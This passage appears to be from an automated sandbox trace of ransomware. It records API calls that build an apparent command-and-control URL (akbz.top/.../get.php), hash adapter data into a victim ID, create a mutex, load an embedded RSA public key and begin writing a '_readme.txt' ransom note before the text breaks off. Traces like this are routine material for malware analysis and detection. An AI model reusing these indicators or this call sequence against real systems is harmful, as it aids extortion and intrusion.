0x3245f18 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3246180 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32463e8 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3246650 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32468b8 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3246b20 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3246d88 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3246ff0 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3247258 [0122.309] lstrlenA (lpString="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x6ff1a8 [0122.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3245cb0, cbMultiByte=-1, lpWideCharStr=0x6ff1a8, cchWideChar=47 | out: lpWideCharStr="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0122.309] lstrcatW (in: lpString1="", lpString2="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.309] lstrlenA (lpString="") returned 0 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c4680 [0122.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3245f18, cbMultiByte=-1, lpWideCharStr=0x31c4680, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.309] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.309] lstrlenA (lpString="") returned 0 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c4650 [0122.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3246180, cbMultiByte=-1, lpWideCharStr=0x31c4650, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.309] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.309] lstrlenA (lpString="") returned 0 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c46f0 [0122.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32463e8, cbMultiByte=-1, lpWideCharStr=0x31c46f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.309] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.309] lstrlenA (lpString="") returned 0 [0122.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c46a0 [0122.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3246650, cbMultiByte=-1, lpWideCharStr=0x31c46a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.309] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.309] lstrlenA (lpString="") returned 0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c46b0 [0122.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32468b8, cbMultiByte=-1, lpWideCharStr=0x31c46b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.310] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.310] lstrlenA (lpString="") returned 0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c4710 [0122.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3246b20, cbMultiByte=-1, lpWideCharStr=0x31c4710, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.310] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.310] lstrlenA (lpString="") returned 0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c46c0 [0122.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3246d88, cbMultiByte=-1, lpWideCharStr=0x31c46c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.310] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.310] lstrlenA (lpString="") returned 0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c46d0 [0122.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3246ff0, cbMultiByte=-1, lpWideCharStr=0x31c46d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.310] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.310] lstrlenA (lpString="") returned 0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x31c46e0 [0122.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3247258, cbMultiByte=-1, lpWideCharStr=0x31c46e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0122.310] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php" [0122.310] lstrlenW (lpString="") returned 0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x645dc0 [0122.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x288) returned 0x32176a0 [0122.310] GetAdaptersInfo (in: AdapterInfo=0x32176a0, SizePointer=0x18d814 | out: AdapterInfo=0x32176a0, SizePointer=0x18d814) returned 0x0 [0122.541] GetAdaptersInfo (in: AdapterInfo=0x32176a0, SizePointer=0x18d814 | out: AdapterInfo=0x32176a0, SizePointer=0x18d814) returned 0x0 [0122.555] GetLastError () returned 0x0 [0122.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x3217930 [0122.577] GetLastError () returned 0x0 [0122.590] GetLastError () returned 0x0 [0122.591] CryptAcquireContextW (in: phProv=0x18d7e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d7e4*=0x680f68) returned 1 [0122.665] CryptCreateHash (in: hProv=0x680f68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d7ec | out: phHash=0x18d7ec) returned 1 [0122.665] CryptHashData (hHash=0x3249220, pbData=0x3254970, dwDataLen=0x11, dwFlags=0x0) returned 1 [0122.665] CryptGetHashParam (in: hHash=0x3249220, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d7e8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d7e8) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x31fd1c0 [0122.665] CryptGetHashParam (in: hHash=0x3249220, dwParam=0x2, pbData=0x31fd1c0, pdwDataLen=0x18d7e8, dwFlags=0x0 | out: pbData=0x31fd1c0, pdwDataLen=0x18d7e8) returned 1 [0122.665] GetLastError () returned 0x0 [0122.665] CryptDestroyHash (hHash=0x3249220) returned 1 [0122.665] CryptReleaseContext (hProv=0x680f68, dwFlags=0x0) returned 1 [0122.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3254970 | out: hHeap=0x620000) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fca8 [0122.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fa08 | out: hHeap=0x620000) returned 1 [0122.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3254948 | out: hHeap=0x620000) returned 1 [0122.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x8ec) returned 0x5d4 [0122.961] WaitForSingleObject (hHandle=0x5d4, dwMilliseconds=0xffffffff) returned 0x0 [0123.889] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5d0 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x324b6c0 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32474c0 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3247728 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3247990 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3247bf8 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3247e60 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32480c8 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3255bf0 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3255e58 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32560c0 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3256328 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e0) returned 0x3219368 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5ef) returned 0x3219750 [0123.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3219750, cbMultiByte=1519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 496 [0123.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5f0) returned 0x321f218 [0123.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219750 | out: hHeap=0x620000) returned 1 [0123.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219368 | out: hHeap=0x620000) returned 1 [0123.901] CryptAcquireContextW (in: phProv=0x18d854, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d854*=0x6803b8) returned 1 [0123.960] CryptCreateHash (in: hProv=0x6803b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d858 | out: phHash=0x18d858) returned 1 [0123.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0123.960] CryptHashData (hHash=0x32491a0, pbData=0x321f218, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0123.960] CryptGetHashParam (in: hHash=0x32491a0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d85c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d85c) returned 1 [0123.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x31fd140 [0123.960] CryptGetHashParam (in: hHash=0x32491a0, dwParam=0x2, pbData=0x31fd140, pdwDataLen=0x18d85c, dwFlags=0x0 | out: pbData=0x31fd140, pdwDataLen=0x18d85c) returned 1 [0123.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x34) returned 0x3249260 [0123.960] GetLastError () returned 0x0 [0123.960] lstrcatA (in: lpString1="", lpString2="61" | out: lpString1="61") returned="61" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61", lpString2="F1" | out: lpString1="61F1") returned="61F1" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F1", lpString2="77" | out: lpString1="61F177") returned="61F177" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F177", lpString2="24" | out: lpString1="61F17724") returned="61F17724" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F17724", lpString2="68" | out: lpString1="61F1772468") returned="61F1772468" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F1772468", lpString2="57" | out: lpString1="61F177246857") returned="61F177246857" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F177246857", lpString2="0C" | out: lpString1="61F1772468570C") returned="61F1772468570C" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F1772468570C", lpString2="01" | out: lpString1="61F1772468570C01") returned="61F1772468570C01" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F1772468570C01", lpString2="19" | out: lpString1="61F1772468570C0119") returned="61F1772468570C0119" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F1772468570C0119", lpString2="3C" | out: lpString1="61F1772468570C01193C") returned="61F1772468570C01193C" [0123.961] GetLastError () returned 0x0 [0123.961] lstrcatA (in: lpString1="61F1772468570C01193C", lpString2="91" | out: lpString1="61F1772468570C01193C91") returned="61F1772468570C01193C91" [0123.961] GetLastError () returned 0x0 [0123.962] lstrcatA (in: lpString1="61F1772468570C01193C91", lpString2="7D" | out: lpString1="61F1772468570C01193C917D") returned="61F1772468570C01193C917D" [0123.962] GetLastError () returned 0x0 [0123.962] lstrcatA (in: lpString1="61F1772468570C01193C917D", lpString2="D2" | out: lpString1="61F1772468570C01193C917DD2") returned="61F1772468570C01193C917DD2" [0123.962] GetLastError () returned 0x0 [0123.962] lstrcatA (in: lpString1="61F1772468570C01193C917DD2", lpString2="B3" | out: lpString1="61F1772468570C01193C917DD2B3") returned="61F1772468570C01193C917DD2B3" [0123.962] GetLastError () returned 0x0 [0123.962] lstrcatA (in: lpString1="61F1772468570C01193C917DD2B3", lpString2="0C" | out: lpString1="61F1772468570C01193C917DD2B30C") returned="61F1772468570C01193C917DD2B30C" [0123.962] GetLastError () returned 0x0 [0123.962] lstrcatA (in: lpString1="61F1772468570C01193C917DD2B30C", lpString2="BD" | out: lpString1="61F1772468570C01193C917DD2B30CBD") returned="61F1772468570C01193C917DD2B30CBD" [0123.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31fd140 | out: hHeap=0x620000) returned 1 [0123.962] CryptDestroyHash (hHash=0x32491a0) returned 1 [0123.962] CryptReleaseContext (hProv=0x6803b8, dwFlags=0x0) returned 1 [0123.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f218 | out: hHeap=0x620000) returned 1 [0123.962] lstrlenA (lpString="61F1772468570C01193C917DD2B30CBD") returned 32 [0123.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e0) returned 0x3219368 [0123.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5ef) returned 0x3219750 [0123.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3219750, cbMultiByte=1519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 496 [0123.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5f0) returned 0x321f218 [0123.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219750 | out: hHeap=0x620000) returned 1 [0123.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219368 | out: hHeap=0x620000) returned 1 [0123.963] lstrcpyA (in: lpString1=0x3228ff0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0123.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f218 | out: hHeap=0x620000) returned 1 [0123.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6ff5b8 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x324b6f0 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3256590 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32567f8 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3256a60 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3256cc8 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3256f30 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3257198 [0123.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3257400 [0123.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3257668 [0123.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32578d0 [0123.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321a2a8 [0123.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x816) returned 0x3221280 [0123.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d860, cbMultiByte=-1, lpWideCharStr=0x3221280, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0123.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x321f218 [0123.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221280 | out: hHeap=0x620000) returned 1 [0123.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x324b750 [0123.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321a510 [0123.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321a778 [0123.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321a9e0 [0123.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321ac48 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321aeb0 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321b118 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321b380 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321b5e8 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321b850 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x321bab8 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x31da518 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x6ed148 [0124.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31da518 | out: hHeap=0x620000) returned 1 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x32634a8 [0124.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ed148 | out: hHeap=0x620000) returned 1 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x3263680 [0124.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32634a8 | out: hHeap=0x620000) returned 1 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x412) returned 0x3263940 [0124.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3263680 | out: hHeap=0x620000) returned 1 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a) returned 0x3263d60 [0124.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3263940 | out: hHeap=0x620000) returned 1 [0124.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x440) returned 0x32634a8 [0124.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1066) returned 0x3264388 [0124.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32634a8, cbMultiByte=-1, lpWideCharStr=0x3264388, cchWideChar=2099 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't 